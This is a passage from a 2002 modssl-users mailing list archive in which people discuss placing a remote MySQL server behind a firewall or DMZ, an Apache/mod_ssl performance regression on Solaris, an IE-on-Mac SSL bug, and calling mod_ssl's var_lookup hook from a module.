------=_NextPart_000_000C_01C1D647.1A72D580-- _________________________________________________________ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 13:52:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA05020; Thu, 28 Mar 2002 13:51:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id NAA04983; Thu, 28 Mar 2002 13:50:18 +0100 (MET) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16qZM9-0000Mr-00 for modssl-users@modssl.org; Thu, 28 Mar 2002 12:50:17 +0000 Received: from 217.134.196.191 ( [217.134.196.191]) as user nick@localhost by webmail.regiocom.net with HTTP; Thu, 28 Mar 2002 12:50:17 +0000 Message-ID: <1017319817.3ca3118985529@webmail.regiocom.net> Date: Thu, 28 Mar 2002 12:50:17 +0000 From: Nick Miles To: modssl-users@modssl.org Subject: Re: Build SSL on Access Remote Database References: <001601c1d5c4$e97b9020$7665808c@youandme> <1017285956.3ca28d44276b1@webmail.regiocom.net> <3CA2C869.5F64C2@bredband.net> In-Reply-To: <3CA2C869.5F64C2@bredband.net> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.1 X-Originating-IP: 217.134.196.191 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Nick Miles X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Certainly a useful article. But I should point out this doesnt deal with PHP- MySQL encryption, only on the User-Apache end. See image: http://www.devshed.com/Server_Side/PHP/SoothinglySeamless/page4.html What the other man was hoping to do (if I understood) was use a remote MySQL database to where he hosts the site, and from PHP access it securely. Therefore a secure tunnel will help on this side. Obviously it should be said that no matter what this set up would be more dangerous than having a MySQL server behind the firewall where the apache/php server is hosted, also would be terribly slow. Suggestion to get around this might be to use a secure tunnel and replicate data locally, if it doesnt need to be live at the other end that is. Nick Quoting Mikael Pettersson : > Check this article : > http://www.devshed.com/Server_Side/PHP/SoothinglySeamless/page1.html > > They are using > *Apache > *mod_ssl > *openssl > *php > *mysql > > /Micke ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 14:25:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA07370; Thu, 28 Mar 2002 14:24:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from exchange00.SC.ESILICON.COM id OAA07311; Thu, 28 Mar 2002 14:23:24 +0100 (MET) Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19) id ; Thu, 28 Mar 2002 05:23:17 -0800 Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D1D36@exchange00.SC.ESILICON.COM> From: David Marshall To: "'modssl-users@modssl.org'" Subject: RE: Build SSL on Access Remote Database Date: Thu, 28 Mar 2002 05:23:03 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Marshall X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Obviously it should be said that no matter what this set up would be more > dangerous than having a MySQL server behind the firewall where the apache/php > server is hosted, also would be terribly slow. Depending on your firewall, performance does not have to be slow. Firewalls must be sized for the load, just like servers. We run a CISCO ArrowPoint Load Balancing CSS in front of Apache 1.3.19 Mod_SSL(StrongHold 3 build 3014) We run a CISCO PIX 520 between Apache and WebLogic 5.1. We run a CISCO PIX 535 between Weblogic and Oracle 8i without performance issues. The Oracle datafiles are on a Net Appliance Filer, with a 1GB ethernet from Oracle to the Filer. David ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 15:23:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA11378; Thu, 28 Mar 2002 15:22:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id PAA11340; Thu, 28 Mar 2002 15:21:46 +0100 (MET) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16qamf-0000P6-00 for modssl-users@modssl.org; Thu, 28 Mar 2002 14:21:45 +0000 Received: from 217.135.238.68 ( [217.135.238.68]) as user nick@localhost by webmail.regiocom.net with HTTP; Thu, 28 Mar 2002 14:21:45 +0000 Message-ID: <1017325305.3ca326f96cee6@webmail.regiocom.net> Date: Thu, 28 Mar 2002 14:21:45 +0000 From: Nick Miles To: modssl-users@modssl.org Subject: RE: Build SSL on Access Remote Database References: <691874941F1F954198F7E7FCBAEF1FAE0D1D36@exchange00.SC.ESILICON.COM> In-Reply-To: <691874941F1F954198F7E7FCBAEF1FAE0D1D36@exchange00.SC.ESILICON.COM> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.1 X-Originating-IP: 217.135.238.68 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Nick Miles X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sorry seem to be confusing people here. I was trying to say it would be faster behind the firewall than the way he is approaching it at present. Currently he has: MYSQL | --------------- USER -| INTERNET |- WEBSERVER --------------- Where he wants to securley connect to MySQL from the webserver. Im saying performance and security would be better as: ------------ ------------- --------- USER -| INTERNET |-| FIREWALL |- WEBSERVER -| DMZ |- MYSQL ------------ ------------- --------- Or combinations there of. Hope that makes sense :/ Nick Quoting David Marshall : > > Obviously it should be said that no matter what this set up would be more > > > dangerous than having a MySQL server behind the firewall where the > apache/php > > server is hosted, also would be terribly slow. > > Depending on your firewall, performance does not have to be slow. Firewalls > must be sized for the load, just like servers. > > We run a CISCO ArrowPoint Load Balancing CSS in front of Apache 1.3.19 > Mod_SSL(StrongHold 3 build 3014) > We run a CISCO PIX 520 between Apache and WebLogic 5.1. > We run a CISCO PIX 535 between Weblogic and Oracle 8i without performance > issues. > The Oracle datafiles are on a Net Appliance Filer, with a 1GB ethernet from > Oracle to the Filer. > > David ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 15:35:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA12043; Thu, 28 Mar 2002 15:34:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from brunog.spinweb.net id PAA12033; Thu, 28 Mar 2002 15:33:59 +0100 (MET) Received: from xbridge.com (xbridgelimited-2.dsl.easynet.co.uk [212.135.187.146]) by brunog.spinweb.net (8.11.6) id g2SEXvn25478; Thu, 28 Mar 2002 14:33:57 GMT Message-ID: <3CA32AB6.5010407@xbridge.com> Date: Thu, 28 Mar 2002 14:37:42 +0000 From: Bruno Georges User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4) Gecko/20010923 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Build SSL on Access Remote Database References: <691874941F1F954198F7E7FCBAEF1FAE0D1D36@exchange00.SC.ESILICON.COM> <1017325305.3ca326f96cee6@webmail.regiocom.net> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Bruno Georges X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Nick, I don't want to be pedantic but, just a quick comment, Having MYSQL behind the DMZ won't prevent people from breaking into it. If someone can pass through your firewall it'll be quite easy for that person to get Mysql username and password from your php code and access the data you try to protect using a DMZ. As a result I would keep MYSQL where you have the WEBSERVER, it'll be faster and as secure. Saying that, I assume that the MYSQL db server is not accessed behind the DMZ, if this is the case , yes you'd better keep it protected. Hope that makes sense. Bruno Georges Nick Miles wrote: >Sorry seem to be confusing people here. I was trying to say it would be faster >behind the firewall than the way he is approaching it at present. > >Currently he has: > > MYSQL > | > --------------- >USER -| INTERNET |- WEBSERVER > --------------- > >Where he wants to securley connect to MySQL from the webserver. Im saying >performance and security would be better as: > > ------------ ------------- --------- >USER -| INTERNET |-| FIREWALL |- WEBSERVER -| DMZ |- MYSQL > ------------ ------------- --------- > > >Or combinations there of. Hope that makes sense :/ > >Nick > > >Quoting David Marshall : > >>>Obviously it should be said that no matter what this set up would be more >>> >>>dangerous than having a MySQL server behind the firewall where the >>> >>apache/php >> >>>server is hosted, also would be terribly slow. >>> >>Depending on your firewall, performance does not have to be slow. Firewalls >>must be sized for the load, just like servers. >> >>We run a CISCO ArrowPoint Load Balancing CSS in front of Apache 1.3.19 >>Mod_SSL(StrongHold 3 build 3014) >>We run a CISCO PIX 520 between Apache and WebLogic 5.1. >>We run a CISCO PIX 535 between Weblogic and Oracle 8i without performance >>issues. >>The Oracle datafiles are on a Net Appliance Filer, with a 1GB ethernet from >>Oracle to the Filer. >> >>David >> > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 17:13:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA18987; Thu, 28 Mar 2002 17:12:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from traven.uol.com.br id RAA18959; Thu, 28 Mar 2002 17:11:55 +0100 (MET) Received: from denao ([192.168.209.103]) by traven.uol.com.br (8.9.1/8.9.1) with ESMTP id NAA06605 for ; Thu, 28 Mar 2002 13:01:27 -0300 (BRT) Subject: Performance Issue From: "Denis A.V.Jr." To: modssl-users@modssl.org Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Evolution/0.15 (Preview Release) Date: 28 Mar 2002 13:05:47 -0300 Message-Id: <1017331547.410.8.camel@blue0x> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Denis A.V.Jr." X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hey there, I have a few webservers using apache+mod_ssl in our site. I have noticed, with the installation of 1.3.2[34] and mod_ssl2.8.[78], a significant performance situation. Now I have a very high load average, which I never had before with older versions of the software (ex: apache1.3.22+mod_ssl 2.8.6). The hardware used are all Sun Enterprise with Solaris 2.7. I searched through this list and couldn't find anyone with the same problem.... no one have those problems also? Thanks in advance. -- Denis A.V.Jr. - denao@uol.com.br Systems Engineer perl -e 'print "computers are like air-conditioners: they stop working when you open windows ", pack("c*",hex "3A",sqrt(2025),(unpack(c,"=")-20),10);' ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 17:55:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA22084; Thu, 28 Mar 2002 17:54:42 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id RAA22030; Thu, 28 Mar 2002 17:53:55 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id LAA26557 for ; Thu, 28 Mar 2002 11:59:40 -0500 Date: Thu, 28 Mar 2002 11:59:39 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: Build SSL on Access Remote Database In-Reply-To: <3CA32AB6.5010407@xbridge.com> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... X-Admonition: The Good thing about potential is X-Admonition2: as long as you do nothing X-Admonition3: you'll always have it. MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users You bastion host the webserver, then bastion host the mysql box, and put it either on a seperate DMZ, or at least a seperate host, and only allow it to talk to the mysql db, and you bastion host the firewall, and only allow http requests to the webserver in the DMZ. Tis the standard way to deal with these beasts. It helps too if you have a screening router dropping most everything through the firewall to the webserver also. It costs a tad more to add all the sec stuffs, but, then intel boxen are pretty cheap. And one can NAT the backend... Thanks, Ron DuFresne On Thu, 28 Mar 2002, Bruno Georges wrote: > Nick, > I don't want to be pedantic but, just a quick comment, > Having MYSQL behind the DMZ won't prevent people from breaking into it. > If someone can pass through your firewall it'll be quite easy for that > person to get Mysql username and password from your php code and access > the data you try to protect using a DMZ. > As a result I would keep MYSQL where you have the WEBSERVER, it'll be > faster and as secure. > Saying that, I assume that the MYSQL db server is not accessed behind > the DMZ, if this is the case , yes you'd better keep it protected. > > Hope that makes sense. > > Bruno Georges > > Nick Miles wrote: > > >Sorry seem to be confusing people here. I was trying to say it would be faster > >behind the firewall than the way he is approaching it at present. > > > >Currently he has: > > > > MYSQL > > | > > --------------- > >USER -| INTERNET |- WEBSERVER > > --------------- > > > >Where he wants to securley connect to MySQL from the webserver. Im saying > >performance and security would be better as: > > > > ------------ ------------- --------- > >USER -| INTERNET |-| FIREWALL |- WEBSERVER -| DMZ |- MYSQL > > ------------ ------------- --------- > > > > > >Or combinations there of. Hope that makes sense :/ > > > >Nick > > > > > >Quoting David Marshall : > > > >>>Obviously it should be said that no matter what this set up would be more > >>> > >>>dangerous than having a MySQL server behind the firewall where the > >>> > >>apache/php > >> > >>>server is hosted, also would be terribly slow. > >>> > >>Depending on your firewall, performance does not have to be slow. Firewalls > >>must be sized for the load, just like servers. > >> > >>We run a CISCO ArrowPoint Load Balancing CSS in front of Apache 1.3.19 > >>Mod_SSL(StrongHold 3 build 3014) > >>We run a CISCO PIX 520 between Apache and WebLogic 5.1. > >>We run a CISCO PIX 535 between Weblogic and Oracle 8i without performance > >>issues. > >>The Oracle datafiles are on a Net Appliance Filer, with a 1GB ethernet from > >>Oracle to the Filer. > >> > >>David > >> > > > > > >______________________________________________________________________ > >Apache Interface to OpenSSL (mod_ssl) www.modssl.org > >User Support Mailing List modssl-users@modssl.org > >Automated List Manager majordomo@modssl.org > > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior security consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 18:38:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA26424; Thu, 28 Mar 2002 18:37:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from traven.uol.com.br id SAA26384; Thu, 28 Mar 2002 18:36:52 +0100 (MET) Received: from denao ([192.168.209.103]) by traven.uol.com.br (8.9.1/8.9.1) with ESMTP id OAA14583 for ; Thu, 28 Mar 2002 14:26:15 -0300 (BRT) Subject: Re: Performance Issue From: "Denis A.V.Jr." To: modssl-users@modssl.org In-Reply-To: <1017331547.410.8.camel@blue0x> References: <1017331547.410.8.camel@blue0x> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Evolution/0.15 (Preview Release) Date: 28 Mar 2002 14:30:35 -0300 Message-Id: <1017336642.503.12.camel@blue0x> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Denis A.V.Jr." X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I compiled it using...: export CFLAGS='-DHARD_SERVER_LIMIT=8192'; ./configure --with-apache=../apache_1.3.24 --with-ssl=../openssl-0.9.6c --disable-rule=DEV_RANDOM --disable-rule=EXPAT --disable-rule=IRIXN32 --disable-rule=IRIXNIS --disable-rule=WANTHSREGEX --enable-module=most --enable-module=mmap_static --enable-shared=ssl --enable-shared=max --prefix=/opt/apache [] On Thu, 2002-03-28 at 13:05, Denis A.V.Jr. wrote: > Hey there, > > I have a few webservers using apache+mod_ssl in our site. > I have noticed, with the installation of 1.3.2[34] and mod_ssl2.8.[78], > a significant performance situation. Now I have a very high load > average, which I never had before with older versions of the software > (ex: apache1.3.22+mod_ssl 2.8.6). > The hardware used are all Sun Enterprise with Solaris 2.7. > > I searched through this list and couldn't find anyone with the same > problem.... no one have those problems also? > > Thanks in advance. > > -- > Denis A.V.Jr. - denao@uol.com.br > Systems Engineer > > perl -e 'print "computers are like air-conditioners: they stop working > when you open windows ", pack("c*",hex > "3A",sqrt(2025),(unpack(c,"=")-20),10);' > -- Denis A.V.Jr. - denao@uol.com.br Systems Engineer - ICQ 2524962 Universo Online perl -e 'print "computers are like air-conditioners: they stop working when you open windows ", pack("c*",hex "3A",sqrt(2025),(unpack(c,"=")-20),10);' ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 18:47:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA27221; Thu, 28 Mar 2002 18:46:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.allcash.de id SAA27132; Thu, 28 Mar 2002 18:45:31 +0100 (MET) Received: from srvall18.allcash.de (srvall18.intern.allcash.de [192.168.85.19]) by mail.allcash.de (8.11.0/8.11.0/SuSE Linux 8.11.0-0.4) with ESMTP id g2SHjPt23857 for ; Thu, 28 Mar 2002 18:45:25 +0100 X-Authentication-Warning: mail.allcash.de: Host srvall18.intern.allcash.de [192.168.85.19] claimed to be srvall18.allcash.de Received: by srvall18.intern.allcash.de with Internet Mail Service (5.5.2655.55) id ; Thu, 28 Mar 2002 18:45:26 +0100 Message-ID: <770FEC75F301D611B59B00902777E56A11462D@srvall18.intern.allcash.de> From: "Nisbach, Thomas" To: "'modssl-users@modssl.org'" Subject: Re: No solution for bug with IE on Mac? Date: Thu, 28 Mar 2002 18:45:18 +0100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.55) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Nisbach, Thomas" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, i found one (unsatisfying) solution: I disabled SSLv3 by setting SSLProtocol -SSLv3 If i do this MSIE on Mac runs but i worry about other browser that would not run anymore :-( Try also what's posted in http://www.mail-archive.com/modssl-users@modssl.org/msg13577.html Thomas ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 18:59:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA28152; Thu, 28 Mar 2002 18:57:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from indigo.quadrant.net id SAA28044; Thu, 28 Mar 2002 18:56:17 +0100 (MET) Received: from [192.168.100.1] (gw.marketingden.com [204.83.38.101]) by indigo.quadrant.net (8.9.1/8.9.1) with ESMTP id LAA17072 for ; Thu, 28 Mar 2002 11:56:09 -0600 (CST) User-Agent: Microsoft-Entourage/9.0.1.3108 Date: Thu, 28 Mar 2002 11:56:08 -0600 Subject: Re: No solution for bug with IE on Mac? From: James Hastings-Trew To: Message-ID: In-Reply-To: <770FEC75F301D611B59B00902777E56A11462D@srvall18.intern.allcash.de> Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: James Hastings-Trew X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > Hi, > > i found one (unsatisfying) solution: > I disabled SSLv3 by setting > > SSLProtocol -SSLv3 > > If i do this MSIE on Mac runs but i worry about > other browser that would not run anymore :-( > > Try also what's posted in > http://www.mail-archive.com/modssl-users@modssl.org/msg13577.html Basically, the only thing that fixed it on my server was to establish a sessioncache. I've been using IE on a Mac with our secure pages for months now. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 19:07:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA29085; Thu, 28 Mar 2002 19:06:39 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ext-mail.valicert.com id TAA28994; Thu, 28 Mar 2002 19:05:35 +0100 (MET) Received: from CONVERSION-DAEMON by ext-mail.valicert.com (PMDF V5.2-33 #46613) id <0GTP009013I63U@ext-mail.valicert.com> for modssl-users@modssl.org; Thu, 28 Mar 2002 10:03:42 -0800 (PST) Received: from polaris.valicert.com ([192.168.2.34]) by ext-mail.valicert.com (PMDF V5.2-33 #46613) with ESMTP id <0GTP008CL3I6T8@ext-mail.valicert.com> for modssl-users@modssl.org; Thu, 28 Mar 2002 10:03:42 -0800 (PST) Received: by polaris.valicert.com with Internet Mail Service (5.5.2653.19) id ; Thu, 28 Mar 2002 10:05:16 -0800 Content-return: allowed Date: Thu, 28 Mar 2002 10:05:14 -0800 From: Himanshu Soni Subject: RE: ap_hook_pool and ssl_var_lookup on solaris To: "'modssl-users@modssl.org'" Message-id: <613B3C619C9AD4118C4E00B0D03E7C3E0297EEB3@polaris.valicert.com> MIME-version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Himanshu Soni X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Ok This one was my bad. I was explicitly linking my module with apache libs and it was only seeing a local copy of the ap_hook_pool. Thanx -----Original Message----- From: Himanshu Soni [mailto:HimanshuS@valicert.com] Sent: Wednesday, March 27, 2002 3:07 PM To: modssl-users@modssl.org Subject: ap_hook_pool and ssl_var_lookup on solaris Hi I have written a module that calls ap_hook_call(char *hook). The hook called is ap::mod_ssl::var_lookup which is registered when mod_ssl loads up in the void (*add_module) (struct module_struct *) call. However, when I make call, at run time, my module dumps core because ap_hook_pool is not initialized for that instance. Does it have something to do with child processes on solaris not being able to get handle to the hook pool? Any ideas? Help is greatly appreciated. Thanx Himanshu Soni ValiCert Inc. http://www.valicert.com Software Engineer phone: 650-567-5491 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 19:10:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA29695; Thu, 28 Mar 2002 19:09:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ext-mail.valicert.com id TAA29531; Thu, 28 Mar 2002 19:08:08 +0100 (MET) Received: from CONVERSION-DAEMON by ext-mail.valicert.com (PMDF V5.2-33 #46613) id <0GTP009013ML5E@ext-mail.valicert.com> for modssl-users@modssl.org; Thu, 28 Mar 2002 10:06:21 -0800 (PST) Received: from polaris.valicert.com ([192.168.2.34]) by ext-mail.valicert.com (PMDF V5.2-33 #46613) with ESMTP id <0GTP008DV3MLT8@ext-mail.valicert.com> for modssl-users@modssl.org; Thu, 28 Mar 2002 10:06:21 -0800 (PST) Received: by polaris.valicert.com with Internet Mail Service (5.5.2653.19) id ; Thu, 28 Mar 2002 10:07:55 -0800 Content-return: allowed Date: Thu, 28 Mar 2002 10:07:55 -0800 From: Himanshu Soni Subject: RE: SSL_CLIENT_CERT in the access check phase To: "'modssl-users@modssl.org'" Message-id: <613B3C619C9AD4118C4E00B0D03E7C3E0297EEB4@polaris.valicert.com> MIME-version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-type: text/plain Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Himanshu Soni X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi All A better way to accomplish this is to use the apache hook mechanism. mod_ssl registers ssl_var_lookup in the apache hook pool and you can call this hook. Here is how: char *pszCert = NULL; if (ap_hook_status("ap::mod_ssl::var_lookup") == AP_HOOK_STATE_REGISTERED) { if (r && r->pool && r->server && r->connection) { ap_hook_call("ap::mod_ssl::var_lookup", &pszCert, r->pool, r->server, r->connection, r, "SSL_CLIENT_CERT"); } } Thanx Himanshu Soni -----Original Message----- From: Mads Toftum [mailto:mads@toftum.dk] Sent: Tuesday, March 26, 2002 11:41 AM To: modssl-users@modssl.org Subject: Re: SSL_CLIENT_CERT in the access check phase On Tue, Mar 26, 2002 at 10:46:42AM -0800, Himanshu Soni wrote: > Hi > > Thanx for the info. > I see that you call ssl_var_lookup(..) which internally calls ap_table_get > on the SSL_CLIENT_CERT_DN enviornment variable. > When I compile my module with ssl_var_lookup(..), it fails during linking. > This is because ssl_var_lookup(..) is not exported. > > How did you manage to resolve this symbol in your builds? > I don't remember doing anything special - except what you see in the module/ makefile. IIRC I just looked at the code in mod_ssl and found the appropriate function by looking at what was being used elsewhere. The module is close to two years old and I haven't used it much lately, so YMMV. vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 19:18:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA00487; Thu, 28 Mar 2002 19:17:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id TAA00437; Thu, 28 Mar 2002 19:16:12 +0100 (MET) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g2SIBKZ30591; Thu, 28 Mar 2002 13:11:20 -0500 Date: Thu, 28 Mar 2002 13:11:20 -0500 (EST) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: "Denis A.V.Jr." cc: modssl-users@modssl.org Subject: Re: Performance Issue In-Reply-To: <1017336642.503.12.camel@blue0x> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, 2002-03-28 at 13:05, Denis A.V.Jr. wrote: > > I have a few webservers using apache+mod_ssl in our site. > I have noticed, with the installation of 1.3.2[34] and mod_ssl2.8.[78], > a significant performance situation. Now I have a very high load > average, which I never had before with older versions of the software > (ex: apache1.3.22+mod_ssl 2.8.6). > The hardware used are all Sun Enterprise with Solaris 2.7. To help track this down, can you do a before-and-after run of the following: truss -c lockstat -CP sleep 5 and email the outputs of both from the old version and the new version to me? Thanks, Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Mar 28 21:20:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA09595; Thu, 28 Mar 2002 21:19:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from iaweb02.ifmc.org id VAA09569; Thu, 28 Mar 2002 21:18:21 +0100 (MET) Received: from GW5DOM2-Message_Server by iaweb02.ifmc.org with Novell_GroupWise; Thu, 28 Mar 2002 14:18:15 -0600 Message-Id: X-Mailer: Novell GroupWise 5.5.2 Date: Thu, 28 Mar 2002 14:18:06 -0600 From: "Mary Peterson" To: Subject: Multiple CA's in SSLCACertificateFile Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Disposition: inline Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA09591 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Mary Peterson" 